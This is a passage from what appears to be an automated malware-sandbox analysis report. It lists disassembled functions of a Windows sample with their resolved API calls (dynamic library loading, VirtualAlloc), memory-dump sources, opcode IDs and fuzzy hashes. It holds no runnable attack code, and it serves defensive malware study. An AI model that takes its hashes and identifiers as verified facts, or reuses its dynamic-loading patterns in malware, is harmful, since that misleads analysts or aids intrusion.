                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$InvalidateParentRectTimeout
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3648793173-2594219639
                                                                                                                      • Opcode ID: 2e66addd6f6e4c2ee6c7231dac85ac1ea9eb91e0640ba1c5be65eb262c17104c
                                                                                                                      • Instruction ID: de7c4a308d081757124f4a387464ee5d4ce13cf25d7da5d6ec006048564f3c61
                                                                                                                      • Opcode Fuzzy Hash: 2e66addd6f6e4c2ee6c7231dac85ac1ea9eb91e0640ba1c5be65eb262c17104c
                                                                                                                      • Instruction Fuzzy Hash: 99F0ED34618240FBEF322F60DC09FA67BA9EF12780F104129F9819B1A0C6A69C51AB94
                                                                                                                      Function 003C2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 003C2F79
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003C2F80
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                      • API String ID: 2574300362-340411864
                                                                                                                      • Opcode ID: d4834e1aa04fb9793fc5c13ec193b915cde1f67dd5962e5e9b67a0824819ffc3
                                                                                                                      • Instruction ID: 01d49c68e998cf5131d4ef1eb65ce7c2230aae3bad4e7425384b0e12ece85770
                                                                                                                      • Opcode Fuzzy Hash: d4834e1aa04fb9793fc5c13ec193b915cde1f67dd5962e5e9b67a0824819ffc3
                                                                                                                      • Instruction Fuzzy Hash: 3FE01A70B94314ABDB605F70EC4AF963664B702B06FA00438F542D10E0EBFA8450DF0D
                                                                                                                      Function 003C3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003C2F4E), ref: 003C304E
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003C3055
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 2574300362-2819208100
                                                                                                                      • Opcode ID: 0824f000bb444bcf18135fe78a24061308c238163ef915c25007862b94cb3769
                                                                                                                      • Instruction ID: 532ce34e09a60b485e2e8b44d725e2458cb7798400222eac89bc9ee7b287cf2c
                                                                                                                      • Opcode Fuzzy Hash: 0824f000bb444bcf18135fe78a24061308c238163ef915c25007862b94cb3769
                                                                                                                      • Instruction Fuzzy Hash: 29E0B671A54310ABDB315F61ED0DB963A64B711B06F600178F10AD10B0EBFA8510CB1E
                                                                                                                      Function 0041BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: 2b593c3704a85ace07113184662cbfafc3e847301da58308401bd4ea27f97f6f
                                                                                                                      • Instruction ID: 2d9edf544411ac31dda4c442464919b5c47239ffc28718b0f31d7b0139d3958e
                                                                                                                      • Opcode Fuzzy Hash: 2b593c3704a85ace07113184662cbfafc3e847301da58308401bd4ea27f97f6f
                                                                                                                      • Instruction Fuzzy Hash: C3E01271C0811CEAC755C6908D46AFA737CEF04381F6044D3BD56D1004D3399BD5AB6B
                                                                                                                      Function 004020F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004020EC,?,004022E0), ref: 00402104
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00402116
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetProcessId$kernel32.dll
                                                                                                                      • API String ID: 2574300362-399901964
                                                                                                                      • Opcode ID: fae2c3d835075bcfef4de783754dd77a491fbb51e69fe98a964778dece923c04
                                                                                                                      • Instruction ID: 1d872c93ab84d5f35a8df8a469bad7503b62a124498070d998ba1485bd2c61da
                                                                                                                      • Opcode Fuzzy Hash: fae2c3d835075bcfef4de783754dd77a491fbb51e69fe98a964778dece923c04
                                                                                                                      • Instruction Fuzzy Hash: ACD0A7349003129FD7305F60E90E75336E4AB44305B20443BEA49F1ADED7F8C481CA1C
                                                                                                                      Function 003BE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003BE69C,76F90AE0,003BE5AC,0043DC28,?,?), ref: 003BE6B4
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003BE6C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: ed73fedebbd0196d99be8005b53e2d4d612404d8f4d11925f2c35fd63f428810
                                                                                                                      • Instruction ID: ed5afa978d5fd1243e4460814b453d70c3d6ad6e802795edfb89095835d00769
                                                                                                                      • Opcode Fuzzy Hash: ed73fedebbd0196d99be8005b53e2d4d612404d8f4d11925f2c35fd63f428810
                                                                                                                      • Instruction Fuzzy Hash: F3D0A7359003228FD7315F34E8097D237D4AB24306B21542BE945D1A68D7B4C480861C
                                                                                                                      Function 003BE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003BE6D9,?,003BE55B,0043DC28,?,?), ref: 003BE6F1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 003BE703
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3024904723
                                                                                                                      • Opcode ID: 78a79ca9d4ce6f4d4a60b7fc46064386e33e9e16340acb8e74daeca097190805
                                                                                                                      • Instruction ID: 08c7818590f81259e6649cfcdb1b2cbff79bd4eec1034ea19d4124ba8d032c21
                                                                                                                      • Opcode Fuzzy Hash: 78a79ca9d4ce6f4d4a60b7fc46064386e33e9e16340acb8e74daeca097190805
                                                                                                                      • Instruction Fuzzy Hash: 4FD0A7359003128FD7302F24E84E7D33BD4BB05306B21442BE995E2956DBB8C480C618
                                                                                                                      Function 003FEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003FEBAF,?,003FEAAC), ref: 003FEBC7
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003FEBD9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                      • Opcode ID: 9a9412a0630c3299b44ebeb347535543dc49ba7c9ef0fa45580efb93f1f62a90
                                                                                                                      • Instruction ID: 73afc2b0d3f9b540f0cedb58f6fef43700f77e5374c7bb3dc6d00b905fbcd9c7
                                                                                                                      • Opcode Fuzzy Hash: 9a9412a0630c3299b44ebeb347535543dc49ba7c9ef0fa45580efb93f1f62a90
                                                                                                                      • Instruction Fuzzy Hash: 1CD0A7349083129FD7301F30E849B6136D4AB44305B71842BF956D1664DBB8DC808618
                                                                                                                      Function 003E137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,003E135F,?,003E1440), ref: 003E1389
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 003E139B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                      • API String ID: 2574300362-1071820185
                                                                                                                      • Opcode ID: 60491ae9e523883d0b4a6207db14e7447ca060ec48b13c8efce7337438c39680
                                                                                                                      • Instruction ID: 97b071a060f3925139f68a39756ea18a90b190ef7df0f7b68fb959d34df89885
                                                                                                                      • Opcode Fuzzy Hash: 60491ae9e523883d0b4a6207db14e7447ca060ec48b13c8efce7337438c39680
                                                                                                                      • Instruction Fuzzy Hash: 68D0A734D003229FD7314F25EC0879236D4AF04706F25442AE885D19D8D674C884871C
                                                                                                                      Function 003E13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,003E1371,?,003E1519), ref: 003E13B4
                                                                                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003E13C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                      • API String ID: 2574300362-1587604923
                                                                                                                      • Opcode ID: 2ee053fc97fc30ac25680758d2ab832b640ded0568495f064b80bdd6d477dbe5
                                                                                                                      • Instruction ID: 7458478098516d0f3e53286e0a9e80cbbfdbf405951ba395dc769cae9fc17a34
                                                                                                                      • Opcode Fuzzy Hash: 2ee053fc97fc30ac25680758d2ab832b640ded0568495f064b80bdd6d477dbe5
                                                                                                                      • Instruction Fuzzy Hash: 87D0A738A003229FD7324F25E80879136E8AB40706F21442AE855D19ACDAB4C4848728
                                                                                                                      Function 00403ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00403AC2,?,00403CF7), ref: 00403ADA
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00403AEC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: 888458aa9a647a459eb4a7ebe83915e42a72437f44392c0a23560c5d8daf4f6d
                                                                                                                      • Instruction ID: 7481b2ad75a18a1e49d9df9a4a86f9e6f41a9d6471809fd4cc98782e9bdc236f
                                                                                                                      • Opcode Fuzzy Hash: 888458aa9a647a459eb4a7ebe83915e42a72437f44392c0a23560c5d8daf4f6d
                                                                                                                      • Instruction Fuzzy Hash: BED05E30A003139ED7204FA0A8097923AD8AB1630AB20443AE895A1698EAB8C4809A1C
                                                                                                                      Function 003AAA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,003F6AA6), ref: 003AAB2D
                                                                                                                      • _wcscmp.LIBCMT ref: 003AAB49
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper_wcscmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 820872866-0
                                                                                                                      • Opcode ID: 407968d985c88543de06b3e7be817ee1af59c0e2d7e4594d85b652dd168a376f
                                                                                                                      • Instruction ID: 38e16a48560b8910fe51fb9bd51760de73c2bd31cb9ee89814002fe3a74a2573
                                                                                                                      • Opcode Fuzzy Hash: 407968d985c88543de06b3e7be817ee1af59c0e2d7e4594d85b652dd168a376f
                                                                                                                      • Instruction Fuzzy Hash: B6A1247270090ADBDB16DF64E9806BDBBA5FF49300F65416AEC06C7290EB30D8B0C796
                                                                                                                      Function 00400D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00400D85
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00400DC8
                                                                                                                        • Part of subcall function 00400458: CharLowerBuffW.USER32(?,?,?,?), ref: 00400478
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00400FB2
                                                                                                                      • _memmove.LIBCMT ref: 00400FC2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3659485706-0
                                                                                                                      • Opcode ID: 06e7c503bb292d2472238fc0ca686a7c95d3cda76363a6b8b4126a7853d159f1
                                                                                                                      • Instruction ID: 03f2ffde39573ddcc81fb0b4d50025e2cd73e3ad70c59d7b1b1f94d88085fd0b
                                                                                                                      • Opcode Fuzzy Hash: 06e7c503bb292d2472238fc0ca686a7c95d3cda76363a6b8b4126a7853d159f1
                                                                                                                      • Instruction Fuzzy Hash: B2B1A3716043008FC715DF28C840A6AB7E4EF89714F14896EF989EB392DB35ED46CB95
                                                                                                                      Function 003FAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003FAF56
                                                                                                                      • CoUninitialize.COMBASE ref: 003FAF61
                                                                                                                        • Part of subcall function 003E1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003E10B8
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FAF6C
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003FB23F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 780911581-0
                                                                                                                      • Opcode ID: 038d6d38312205b80d18cc1878c1924837b9100e0aa14dc073edbb83e7c634f2
                                                                                                                      • Instruction ID: f0435e0716bacf632dbac287f27b87ab15ff5dd4b20407220a39a56eb3e87f3f
